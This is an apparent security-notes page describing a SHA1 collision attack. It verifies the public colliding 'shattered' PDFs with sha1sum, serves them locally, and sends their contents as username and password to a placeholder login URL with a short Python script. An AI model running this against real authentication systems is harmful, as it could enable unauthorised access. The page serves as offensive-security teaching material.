Exploit Notes

SHA1 Hash Collision Attack

Last modified: 2023-02-01


Basic reconnaisance flows.

Sample Attacks

1. Download two Files

There are several ways to download files. So we can select our desired files as purposes.

Check if the SHA1 hash is the same as each other.

sha1sum shattered-1.pdf
sha1sum shattered-2.pdf

sha1sum messageA
sha1sum messageB

2. Host the PDF Files Locally

In the directory where the two PDF files located, start local server for using in a Python script.

python3 -m http.server 8000

3. Create a Python Script

For example, create a “test.py”.

import requests

file1 = "shattered-1.pdf"
file2 = "shattered-2.pdf"

pdf_1 = requests.get(f'http://localhost:8000/{file1}')
pdf_2 = requests.get(f'http://localhost:8000/{file2}')

# e.g. the two values can be used as username/password.
params = {'username': pdf_1.content, 'password': pdf_2.content}
r = requests.get('https://example.com/login', params=params)

4. Run the Script

python3 test.py

Tools by HDKS


Automatic web fuzzer.


Auto reconnaissance CLI.

Hash Cracker

Hash identifier.